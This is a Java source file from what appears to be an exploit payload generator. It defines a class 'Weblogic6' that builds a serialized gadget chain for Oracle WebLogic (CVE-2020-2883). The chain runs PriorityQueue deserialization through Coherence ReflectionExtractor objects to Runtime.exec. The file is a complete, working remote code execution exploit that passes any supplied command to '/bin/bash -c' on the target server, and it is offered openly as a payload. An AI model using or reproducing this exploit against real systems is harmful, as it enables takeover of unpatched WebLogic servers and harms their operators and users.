package payloads;

import com.tangosol.util.ValueExtractor;
import com.tangosol.util.comparator.ExtractorComparator;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import common.Serializerable;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.PayloadRunner;
import util.Reflections;

import java.lang.reflect.Field;
import java.util.PriorityQueue;


/*

ObjectInputStream.readObject()
    PriorityQueue.readObject()
        PriorityQueue.heapify()
            PriorityQueue.siftDown()
                siftDownUsingComparator()
                    com.tangosol.util.comparator.ExtractorComparator.compare()
                        com.tangosol.util.extractor.ChainedExtractor.extract()
                            com.tangosol.util.extractor.ReflectionExtractor().extract()
                                Method.invoke()
                                .......
                            com.tangosol.util.extractor.ReflectionExtractor().extract()
                                Method.invoke()
                                Runtime.exec()
 */

// CVE-2020-2883 1

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4"})
@Authors({ Authors.FROHOFF })
public class Weblogic6 implements ObjectPayload<Object> {

	public byte[] getObject(final String command) throws Exception {
		ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[]{}});
		ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}});        //ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"calc"}});
		ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash", "-c", command}});

		ValueExtractor[] valueExtractors = new ValueExtractor[]{
				reflectionExtractor1,
				reflectionExtractor2,
				reflectionExtractor3,
		};

		Class clazz = ChainedExtractor.class.getSuperclass();
		Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
		m_aExtractor.setAccessible(true);

		ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
		ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
				reflectionExtractor
		};

		ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);

		PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
		queue.add("1");
		queue.add("1");
		m_aExtractor.set(chainedExtractor1, valueExtractors);

		Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
		queueArray[0] = Runtime.class;
		queueArray[1] = "1";

		return Serializerable.serialize(queue);
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return Weblogic6.class.newInstance().getObject(command);
	}

}
